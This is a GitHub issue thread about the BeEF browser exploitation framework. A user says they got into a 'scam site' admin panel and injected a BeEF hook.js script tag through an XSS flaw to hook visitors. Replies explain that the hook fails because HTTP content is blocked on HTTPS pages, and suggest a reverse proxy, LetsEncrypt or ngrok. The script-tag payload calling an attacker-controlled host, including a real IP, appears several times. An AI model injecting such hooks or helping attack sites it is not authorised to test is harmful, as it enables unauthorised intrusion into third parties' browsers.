why my hook.js not working on this site
tieumap opened this issue · 14 comments
hello you guys
affter i install beef, and i got xxx:3000/hook.js
i make insert <script src="http://xxxx:3000/hook.js"></script> to my site in html, then i go beef panel wokring well
but...
when i found site scam, i can login admin and them have vulnerability xss
and i use script <script src="http://xxxx:3000/hook.js"></script> insert to form then success like this
but when i load page, my panel still not show
and when i check code of site scam i got this
in headed i found code
so that why my hook.js not working? right or not
and how can i fix it? them site scam i want destroy them
thanks so much
您正在混合 HTTP 和 HTTPS 内容。
BeEF is using HTTP. The hooked website is using HTTPS.
Most modern websites using HTTPS and modern web browsers do not load mixed active content, such as JavaScript, from clear text HTTP websites. To hook HTTP websites, ideally you should set up a frontend reverse proxy or configure BeEF on port 443 with HTTPS enabled and valid certificates.
my site use https still working :D but i make try for https
well
i has been use https but still not working!
so that is site scam block hook.js
您正在混合 HTTP 和 HTTPS 内容。
BeEF is using HTTP. The hooked website is using HTTPS.
Most modern websites using HTTPS and modern web browsers do not load mixed active content, such as JavaScript, from clear text HTTP websites. To hook HTTP websites, ideally you should set up a frontend reverse proxy or configure BeEF on port 443 with HTTPS enabled and valid certificates.
* https://developer.mozilla.org/en-US/docs/Web/Security/Mixed_content#mixed_active_content * https://developer.mozilla.org/en-US/docs/Web/Security/Mixed_content/How_to_fix_website_with_mixed_content
Interesting, so in order for beef-xss to operate on https sites we need to setup a front end reverseproxy, have it run on port 443, have Https enabled, and have valid certificates.
how would I get valid certificates that's my only question I assume we would have to generate them ourselves right? Using what tool.
just want know how i setup reverseproxy
i need video how to make reverse proxy for beef
pls anyone can do and help :(
how would I get valid certificates that's my only question I assume we would have to generate them ourselves right? Using what tool.
LetsEncrypt are popular for free certificates.
Some people like using a tunneling solution such as ngrok instead. This requires a paid account.
how would I get valid certificates that's my only question I assume we would have to generate them ourselves right? Using what tool.
LetsEncrypt are popular for free certificates.
Some people like using a tunneling solution such as ngrok instead. This requires a paid account.
so why i use ngrok free i still got domain and can access :D but i want ask, how long domain ngrok running? unlimit time or 2 day 2 week? do you know?
so why i use ngrok free i still got domain and can access :D
ngrok detects and blocks abuse of free accounts.
how long domain ngrok running? unlimit time or 2 day 2 week? do you know?
I do not know. It is limited.
so why i use ngrok free i still got domain and can access :D
ngrok detects and blocks abuse of free accounts.
how long domain ngrok running? unlimit time or 2 day 2 week? do you know?
I do not know. It is limited.
big mate, i am install nginx and make LetsEncrypt
but can you show me file config nginx to do that? yeah i need that config, if no cannot run
I actually just reported a hook problem and this might not have anything to do with beef you guys hear me out we have two pages running right the Centos Apache page which runs on port 3000 and the apache page we run on port 80 the centos apache page
automatically starts I haven't checked yet if it's because of beef or something else but this can potentially cause traffic issues I believe...possibly I found this out by writing this rule in my chain
sudo iptables -t nat -I PREROUTING -p tcp -s 192.168.1.9 -j DNAT --to-destination 192.168.1.5:3000
that directs us to our apache2 centos page so the real question is how do we disable the apacche2 centos page? and why
is beef auto starting that page that's causing our hooks to possibly fail
I'll post pictures, because this auto start of apache can be causing issues they also mentioned something about that in
my Network Penetration course with Zaid Security
hello you guys affter i install beef, and i got xxx:3000/hook.js i make insert <script src="http://xxxx:3000/hook.js"></script> to my site in html, then i go beef panel wokring well
but... when i found site scam, i can login admin and them have vulnerability xss
and i use script <script src="http://xxxx:3000/hook.js"></script> insert to form then success like this
but when i load page, my panel still not show
and when i check code of site scam i got this
<script async="" src="http://34.205.68.184:3000/hook.js"></script>in headed i found code
so that why my hook.js not working? right or not and how can i fix it? them site scam i want destroy them thanks so much
read into what I just said and I'll try to translate if you need me to man
that directs us to our apache2 centos page so the real question is how do we disable the apacche2 centos page? and why
is beef auto starting that page that's causing our hooks to possibly fail
If the web server imitation is confusing you can disable it in the config file.
This issue as been marked as stale due to inactivity and will be closed in 7 days